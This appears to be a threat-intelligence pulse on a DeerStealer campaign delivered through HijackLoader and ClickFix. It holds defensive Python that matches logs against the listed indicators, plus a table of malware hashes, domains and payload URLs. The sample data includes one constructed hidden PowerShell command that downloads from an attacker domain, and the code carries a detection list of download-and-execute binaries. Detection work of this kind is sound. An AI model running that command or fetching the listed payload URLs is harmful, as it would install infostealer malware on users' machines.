Pulse: Don't Get Caught in the Headlights - DeerStealer Analysis
TLP: WHITE | Author: PetrP.73 | Created: 2025-06-13 | Modified: 2025-06-13
Indicators: 52 | Tags: HIGH VOLUME
In May 2025, threat actors increasingly attempted to download and execute the HijackLoader malware loader, often delivering DeerStealer, an information stealer advertised on dark-web forums by the user "LuciferXfiles", as the final payload. The initial access method observed in these chains is ClickFix: victims are redirected to phishing pages that instruct them to paste and run a command in the Windows Run prompt. The chain begins by loading an unsigned, tampered copy of a legitimate DLL named "cmdres.dll", modified so that it launches HijackLoader.
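The description above says the chain starts from a command pasted into the Windows Run prompt and then pulls stages from the listed hosts. The Python below is an added example, not code from the pulse author or from any analysis the pulse cites: it loads a subset of the pulse's own indicators, matches proxy-log URLs against them (walking up to parent domains so that a fresh subdomain of a listed domain still hits), and applies a heuristic to Run-prompt (RunMRU) strings. The proxy-log lines and the Run-prompt command are constructed for illustration, not captured from this campaign, and the list of download-and-execute binaries is a general ClickFix assumption rather than something the pulse states.

```python
"""IOC matching for the DeerStealer / HijackLoader pulse.

Added example, not code from the pulse author. Indicator values are copied
from the pulse table; the proxy-log lines and the Run-prompt entries below
are constructed for illustration only.
"""
import re
from typing import Optional
from urllib.parse import urlsplit

# Indicators copied from the pulse table (a subset, same values).
PULSE_DOMAINS = {
    "brokpolok.shop", "cdnnode-01.cfd", "cloused-flow.site", "d-nodes.shop",
    "debianlist.cfd", "luckyseaworld.com", "ncloud-servers.shop", "quitarlosi.cfd",
    "sciecdn.cfd", "servicesmesh.pro", "soft-metal-software.cfd",
    "sonorous-horizon-cfd.cfd", "upcdnnodes.cfd", "uplink-mirrors.shop",
}
PULSE_HOSTNAMES = {
    "www.aggiornamentoaggiornamento.com",
    "ethos-lk.luckyseaworld.com",
    "ruffpawpack.luckyseaworld.com",
}
PULSE_URLS = {
    "https://luckyseaworld.com/coin.msi",
    "https://luckyseaworld.com/coin.txt",
    "https://brokpolok.shop/LRIOVUHD.msi",
    "https://www.aggiornamentoaggiornamento.com/big.msi",
    "http://www.aggiornamentoaggiornamento.com/requestverificationclodflare.txt",
}

# Binaries commonly invoked by ClickFix-style Run-prompt commands.
# Assumption: general ClickFix tradecraft, not this campaign's exact command.
LOLBINS = ("powershell", "pwsh", "mshta", "msiexec", "curl", "certutil", "bitsadmin")
# Backslash excluded so a RunMRU trailing "\1" does not stick to the URL.
URL_RE = re.compile(r"https?://[^\s\"'<>|\\]+", re.IGNORECASE)


def host_matches(host: str) -> Optional[str]:
    """Return the matching pulse hostname/domain, walking up parent labels so
    a previously unseen subdomain of a listed domain still hits. The bare TLD
    is never tested."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in PULSE_HOSTNAMES or candidate in PULSE_DOMAINS:
            return candidate
    return None


def url_matches(url: str) -> Optional[str]:
    """Exact URL match first, then fall back to the host part of the URL."""
    url = url.strip()
    if url in PULSE_URLS:
        return url
    hostname = urlsplit(url).hostname
    return host_matches(hostname) if hostname else None


def scan_proxy_log(text: str) -> list:
    """Parse 'timestamp src method url status' lines; return one hit per IOC match."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # blank or malformed line
        ts, src, _method, url, _status = fields
        ioc = url_matches(url)
        if ioc:
            hits.append({"ts": ts, "src": src, "url": url, "ioc": ioc})
    return hits


def scan_run_command(cmd: str) -> dict:
    """Heuristic for a ClickFix-style Run-prompt entry: report every embedded
    URL that resolves to a pulse IOC, and whether a download-and-execute
    binary is invoked together with any URL."""
    urls = URL_RE.findall(cmd)
    iocs = [m for u in urls if (m := url_matches(u))]
    lolbin = any(re.search(rf"\b{b}(\.exe)?\b", cmd, re.IGNORECASE) for b in LOLBINS)
    return {"command": cmd, "iocs": iocs, "lolbin": lolbin,
            "suspicious": bool(iocs) or (lolbin and bool(urls))}


# Constructed sample data (not captured from this campaign).
PROXY_LOG = """\
2025-06-12T09:14:02Z 10.0.0.21 GET https://luckyseaworld.com/coin.msi 200
2025-06-12T09:14:05Z 10.0.0.21 GET https://ethos-lk.luckyseaworld.com/x 200
2025-06-12T09:15:11Z 10.0.0.34 GET https://www.example.org/index.html 200
2025-06-12T09:16:40Z 10.0.0.21 GET https://cdn.d-nodes.shop/ngs 404
"""
RUNMRU_SAMPLES = [
    'powershell -w hidden -c "iwr https://luckyseaworld.com/coin.txt"\\1',  # constructed
    "notepad C:\\Users\\me\\notes.txt\\1",                                  # benign
]

if __name__ == "__main__":
    for hit in scan_proxy_log(PROXY_LOG):
        print("proxy hit:", hit)
    for entry in RUNMRU_SAMPLES:
        print("runmru:", scan_run_command(entry))
```

To use this against real data, feed `scan_proxy_log` your proxy or DNS export in the same five-field shape (or adapt the split), and feed `scan_run_command` the values under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` for each user profile; the exact-URL set catches the stage files, while the parent-domain walk catches new subdomains of the listed zones.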
Indicators of Compromise (52)
TYPE  INDICATOR  DESCRIPTION  CREATED
FileHash-MD5 c3f7390f7dbd641fde7eb2922f968345 MD5 of 3a03afc1313854359603522e0792f6a8f9153519eac645cf5811824d936cfbc7 2025-06-13
FileHash-SHA1 45592b1d7091d22706da0d64010f54187b5a85dd SHA1 of 3a03afc1313854359603522e0792f6a8f9153519eac645cf5811824d936cfbc7 2025-06-13
FileHash-SHA256 02d0f858069426ee5bbf04d5d85ff053d8f86867f4fbedb5ef70f78cb2acf086 2025-06-13
FileHash-SHA256 163cfcb8a2c2e14cb77e0d735b87f56ae653d58ad5c69c536396f2936afd1c72 2025-06-13
FileHash-SHA256 24475ae7781189075f64a2de1a7d1fd69b341b7adee67f0bd2286cfbf1f0b7f9 2025-06-13
FileHash-SHA256 3a03afc1313854359603522e0792f6a8f9153519eac645cf5811824d936cfbc7 2025-06-13
FileHash-SHA256 4eae5c64da09969299fd3c1fe05d91f67a425a1e1431b926fda289e4b94fd550 2025-06-13
FileHash-SHA256 674476acafaa975bb80ee9ea7ae24e0bbedb1d1d5c3b3871f718b857b066579d 2025-06-13
FileHash-SHA256 9163f9237ad869a74715f9b126f7c577bd1f12afb8eae37ba07c11f00a39fa3e 2025-06-13
FileHash-SHA256 e34d753f2b992cf74c1b9db61bad4d6c6089ab8ef9fb942c865290b2dd64b4ad 2025-06-13
FileHash-SHA256 eb17f8296482b0c096a2249844a62988b6abdd8ffe8cbbe3398f422968d46875 2025-06-13
URL https://luckyseaworld.com/now.txt 2025-06-13
URL https://luckyseaworld.com/nownow.txt 2025-06-13
URL https://www.aggiornamentoaggiornamento.com/big.msi 2025-06-13
domain brokpolok.shop 2025-06-13
domain cdnnode-01.cfd 2025-06-13
domain cloused-flow.site 2025-06-13
domain d-nodes.shop 2025-06-13
domain debianlist.cfd 2025-06-13
domain luckyseaworld.com 2025-06-13
domain ncloud-servers.shop 2025-06-13
domain quitarlosi.cfd 2025-06-13
domain sciecdn.cfd 2025-06-13
domain servicesmesh.pro 2025-06-13
domain soft-metal-software.cfd 2025-06-13
domain sonorous-horizon-cfd.cfd 2025-06-13
domain upcdnnodes.cfd 2025-06-13
domain uplink-mirrors.shop 2025-06-13
hostname www.aggiornamentoaggiornamento.com 2025-06-13
URL https://d-nodes.shop/DDF 2025-06-13
URL https://d-nodes.shop/ngs 2025-06-13
URL https://d-nodes.shop/ngshDb 2025-06-13
URL https://brokpolok.shop/LRIOVUHD.msi 2025-06-13
URL https://brokpolok.shop/TGFAXKCL.msi 2025-06-13
URL https://brokpolok.shop/XQJFCIHF.msi 2025-06-13
URL https://brokpolok.shop/s 2025-06-13
URL https://brokpolok.shop/s3 2025-06-13
URL https://sciecdn.cfd/gone-2.html 2025-06-13
URL https://ncloud-servers.shop/Hellcat-VI.aspxM 2025-06-13
hostname ethos-lk.luckyseaworld.com 2025-06-13
hostname ruffpawpack.luckyseaworld.com 2025-06-13
URL http://luckyseaworld.com/~therobo3/aHR0cDovL2RqZWttYW5pNGV2ZXIuZnJlZS5mci9zaGVsbC/Confirm.php 2025-06-13
URL https://luckyseaworld.com/812.txt 2025-06-13
URL https://luckyseaworld.com/coin.msi 2025-06-13
URL https://luckyseaworld.com/coin.msi$GMFQ 2025-06-13
URL https://luckyseaworld.com/coin.txt 2025-06-13
URL https://luckyseaworld.com/main.exe 2025-06-13
URL https://luckyseaworld.com/now.txt/ 2025-06-13
URL http://www.aggiornamentoaggiornamento.com/requestverificationclodflare.txt 2025-06-13
URL https://www.aggiornamentoaggiornamento.com/mnogo.exe 2025-06-13
URL https://www.aggiornamentoaggiornamento.com/requestverificationclodflare.txt 2025-06-13
URL https://www.aggiornamentoaggiornamento.com/wp-content/uploads/2021/04/OPTIMA.woff 2025-06-13